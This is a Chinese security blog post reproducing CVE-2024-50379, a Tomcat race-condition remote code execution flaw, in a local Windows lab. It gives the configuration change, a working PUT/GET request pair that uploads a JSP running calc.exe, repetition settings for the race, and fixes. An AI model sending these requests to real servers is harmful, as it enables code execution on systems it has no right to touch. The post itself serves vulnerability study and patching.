Apache Tomcat 远程代码执行漏洞(CVE-2024-50379)

最新推荐文章于 2025-06-30 23:48:35 发布
最新推荐文章于 2025-06-30 23:48:35 发布
阅读量527 收藏 5
点赞数 5
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CSDNwblxiao/article/details/146303968

影响范围:

11.0.0-M1 <= Apache Tomcat <= 11.0.1

10.1.0-M1 <= Apache Tomcat <= 10.1.33

9.0.0.M1 <= Apache Tomcat <= 9.0.97

漏洞描述:

如果对不区分大小写的文件系统(如Windоԝѕ)启用了默认 ѕеrvlеt 的写入功能(将rеаdоnlу 初始化参数设置为非默认值 fаlѕе),则在同时读取和上传同一个文件可以绕过 Tоmсаt 的大小写敏感检查,并导致上传的文件被视为 jsp,从而导致远程代码执行。

利用条件:

在Windows系统下启用PUT请求方式,并将readonly 初始化参数设置为非默认值 false。

漏洞原理:

在Tomcat对文件进行处理安全检查这些操作时,期间存在时间差,当攻击者不断的发送PUT请求不合标准的.Jsp文件和不断的GET该文件,导致了条件竞争,不区分大小写的文件系统在PUT进去的瞬间就被GET编译执行,从而绕过了安全检查

复现步骤:

环境配置:

下载漏洞环境:

https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.97/bin/apache-tomcat-9.0.97-windows-x64.zip

其他版本:

https://archive.apache.org/dist/tomcat/tomcat-9/

下载解压后来到\apache-tomcat-9.0.97\conf目录,找到web.xml文件,将DefaultServlet的readonly配置为false

<init-param>
		<param-name>readonly</param-name>
		<param-value>false</param-value>
</init-param>

windows启动tomcat

访问8080端口

复现:

PUT_Poc:

PUT /test1.Jsp HTTP/1.1
Host: 127.0.0.1:8080

<% Runtime.getRuntime().exec("calc.exe");%>

yakit设置重复发包

GET_Poc:

GET /test1.jsp HTTP/1.1
Host: 127.0.0.1:8080

设置重复发包,以及增加并发线程

然后将这两个发送请求,当弹出计算机时说明成功了,不成功可以增大发包数这些或者增加一个或多个PUT请求(小心calc运行几百个,看到出现就手动暂停发包)

可以在\webapps\ROOT目录下看到上传的文件

修复措施:

1、更新Tomcat至最新版本

2、在不影响业务的前提下将 соnf/ԝеb.хml文件中的 rеаdonlу 参数设置为 truе 或直接注释该参数

3、禁用 PUT 方法并重启 Tоmсаt 服务以启用新的配置

漏洞复现Apache Tomcat远程代码执行漏洞CVE-2024-56337)
李火火的安全圈
12-24 2436
CVE-2024-56337是一个存在于Apache Tomcat中的TOCTOU(Time-of-Check Time-of-Use)竞争条件漏洞。此漏洞源于对先前漏洞CVE-2024-50379)的不完整修复。若默认servlet是可写的(参数readonly设置值为false,该设置为非默认设置)表示不区分大小写文件系统,在负载下并发读取和上传同一文件可以绕过Tomcat的大小写检查。攻击者可以通过构造恶意请求上传含恶意JSP代码的文件,使其触发解析并执行这些文件,从而导致远程代码执行
漏洞修复:Apache Tomcat 安全漏洞(CVE-2024-50379) | Apache Tomcat 安全漏洞(CVE-2024-52318)
专注于计算机研发知识和资讯分享
01-23 1969
解决方案:升级到最新版Tomcat
Apache Tomcat 6.0.24 发布
weixin_30822451的博客
12-07 155
Tomcat是由Apache软件基金会下属的Jakarta项目开发的一个Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和JavaServer Page(JSP)的支持,并提供了作为 Web服务器的一些特有功能,如Tomcat管理和控制平台、安全域管理和Tomcat阀等。由于Tomcat本身也内含了一个HTTP服务器,它也可以被视作一个单独的Web服务...
CVE-2024-50379(真难复现,但真牛逼)
最新发布
weixin_48152280的博客
06-30 1051
条件竞争是指多个线程 / 进程在并发访问共享资源时,因执行顺序(时序)不同导致最终结果异常的现象。共享资源的非原子操作:如读取 - 修改 - 写入(Read-Modify-Write)过程未被保护。(如同一个文件被提交审核的同时修改,可能导致审核和实际不一致的问题)时序依赖:操作结果依赖于多个线程 / 进程的执行顺序。(该CVE在缓存区获取映射的时候由于先拿到了jsp->jsp的缓存,上传操作在到达这里属于这个情况。若 GET 在 PUT 完成前读取文件,则文件不存在,校验失败;
漏洞复现Apache Tomcat partial PUT文件上传反序列化漏洞复现CVE-2025-24813)
qinjilll的博客
03-26 1084
❤️🔥🎉。
Apache Tomcat RCE漏洞复现CVE-2025-24813)
weixin_41971141的博客
05-28 110
使用 partial PUT 请求将恶意的序列化数据写入到会话文件中,在开启文件会话持久化(默认存储位置),并且在文件上传未完成的情况下,内容会被临时存储在 Tomcat 的工作目录。该漏洞的核心在于 Tomcat 在处理不完整PUT请求上传时,会使用了一个基于用户提供的文件名和路径生成的临时文件。表示文件总大小是1200字节,本次上传的是前1001字节(0-1000),后续上传剩余部分(1001-1200)。Tomcat 对不完整的PUT请求上传时的文件名处理机制:文件路径中的分隔符。
tomcat的几种漏洞
网安小白
08-06 922
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
升级 Tomcat 6.0.24+ 享用内存溢出警告
Foxswily的专栏
12-09 291
  项目需要对Tomcat下部署的context做reload,实际效果很差,期间发生PermGen内存溢出。 记得Tomcat6.0.24开始提供内存溢出提示:   http://wiki.apache.org/tomcat/MemoryLeakProtection   6.0.24开始提供溢出log 6.0.25开始在manager提供 Find Leaks 按钮 ——...
Apache Tomcat 远程代码执行漏洞CVE-2024-50379处置建议和缓解措施
拉丁解牛技术专栏
01-22 388
近期,Apache官方修复了Apache Tomcat 远程代码执行漏洞(CVE-2024-50379), 该漏洞是由于Tomcat在验证文件路径时存在缺陷,如果readonly参数被设置为false(这是一个非标准配置),并且服务器允许通过PUT方法上传文件,那么攻击者就可以上传含有恶意JSP代码的文件。通过不断地发送请求,攻击者可以利用条件竞争,使得Tomcat解析并执行这些恶意文件,从而实现远程代码执行Tomcat 是一个开源的、轻量级的 Web 应用服务器 和 Servlet 容器。
Apache Tomcat 信息泄露漏洞CVE-2024-21733、CVE-2024-24549CVE-2024-34750排查处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-14 7319
现场的为中小型项目,未直接使用功能tomcat作为容器使用,仅是jar包里spring-boor框架引入tomcat 内嵌到 web项目中作为web server使用,从而保证项目包可直接运行 webapp项目,无需再部署到额外的tomcat服务了;当不想因为Tomcat就改变SpringBoot的版本时,可以采用排除SpringBoot中的Tomcat包,然后手动指定新的Tomcat的版本来实现升级内置组件的目的,当然还要引入Tomcat相关的包。其中,Coyote作为Tomcat的。
漏洞复现Apache Tomcat 远程代码执行CVE-2025-24813)
李火火的安全圈
03-28 665
Apache Tomcat 是一个开源的、轻量级的 Java Servlet 容器和 Web 服务器,由Apache软件基金会开发和维护,支持运行 Java Servlet、JavaServer Pages (JSP) 和其他基于 Java 的 Web 应用程序,广泛用于开发和部署企业级 Web 应用。
tomcat系列漏洞利用】
10-29 1731
Tomcat 服务器是一个开源的轻量级Web应用服务器,在中小型系统和并发量小的场合下被普遍使用。主要组件:服务器Server,服务Service,连接器Connector、容器Container。连接器Connector和容器Container是Tomcat的核心。一个Container容器和一个或多个Connector组合在一起,加上其他一些支持的组件共同组成一个Service服务,有了Service服务便可以对外提供能力了。
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2913
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
Apache Tomcat 信息泄露漏洞CVE-2023-28708处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
07-10 7717
那么Tomcat就会删除之前的War包解压的文件夹,重新解压新的War包。导致信息泄露,相关分析这是由于在请求https的时候可重定向到http连接,这个过程会导致会话劫持风险,造成Cookie或Session不安全传输,攻击者可利用该漏洞可在未授权的情况下泄漏 Cookie 或 Session,最终造成服务器敏感性信息泄露。改变,包括web-inf/class,wen-inf/lib,web-inf/web.xml等文件,若发生更改,则局部进行加载,不清空session ,不释放内存。
tomcat9漏洞CVE-2024-23672
mzh10588的博客
07-10 6025
Apache Tomcat 输入验证错误漏洞(CVE-2024-24549)Apache Tomcat 11.0.0-M1到11.0.0-M16、‌。Apache Tomcat 安全漏洞(CVE-2024-23672)漏洞名称:CVE-2024-23672。8.5.0到8.5.98等受影响的版本。10.1.0-M1到10.1.18。9.0.0-M1到9.0.85。
Apache Tomcat 远程代码执行漏洞(CVE-2025-24813) 超详细!
热门推荐
欢迎来到我的博客,这里是我分享Python开发心得与信息安全探索的乐园。作为一名热衷于编程与安全的技术爱好者,我始终致力于在Python的世界里深耕细作,探索其强大的功能与无限的可能性。同时,信息安全也是我关注的重点,我深知在这个数字化时代,保护数据安全的
03-14 1万+
远程代码执行漏洞(CVE-2025-24813)源于 Apache Tomcat 的反序列化机制未对用户输入进行严格验证,攻击者可通过构造恶意序列化对象绕过安全限制,处理部分 PUT 请求时,攻击者利用临时文件路径处理中的缺陷(将路径分隔符"/"替换为“.”),通过特定条件(如启用默认 servlet 的写入功能)实现远程代码执行并控制服务器‌。‌将 Apache Tomcat 升级至安全版本(Tomcat 11.0.2+、10.1.34+、9.0.98+),以修复反序列化漏洞及 PUT 请求处理缺陷‌。
Apache Tomcat - 远程代码执行漏洞 - CVE-2024-50379
Blue17 の 小窝
02-16 2118
部分版本 Apache Tomcat 由于在验证文件路径时存在缺陷,如果 readonly 参数被设置为 false(这是一个非标准配置),并且服务器允许通过 PUT 方法上传文件,那么攻击者就可以上传含有恶意 JSP 代码的文件。通过不断的发送请求,攻击者可以利用条件竞争漏洞,使得 Tomcat 解析并执行这些恶意文件,从而实现远程代码执行
Apache Tomcat 远程代码执行漏洞预警(CVE-2024-50379)
m0_37633833的博客
01-07 892
近日,Apache Tomcat官方发布安全公告,披露Apache Tomcat 在特定版本中存在一处远程代码执行漏洞CVE-2024-50379)。由于Apache Tomcat在校验文件路径时存在缺陷,如果对不区分大小写的文件系统启用了默认 servlet 的写入功能(将 readonly 初始化参数设置为非默认值 false),则在负载下同时读取和上传同一文件可以绕过 Tomcat 的大小写敏感检查,并导致上传的文件被视为 JSP,从而导致远程代码执行
#漏洞复现#--CVE-2017-12615Tomcat put方法任意文件写入漏洞
2201_75578072的博客
11-06 351
CVE-2017-12615Tomcat put方法任意文件写入漏洞
Apache Tomcat远程代码执行漏洞CVE-2025-24813)复现
03-25
### Apache Tomcat CVE-2025-24813 远程代码执行漏洞复现 #### 漏洞概述 Apache Tomcat远程代码执行漏洞 (CVE-2025-24813) 存在于特定版本中,当满足某些条件时,攻击者可以利用该漏洞实现未授权的恶意代码执行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值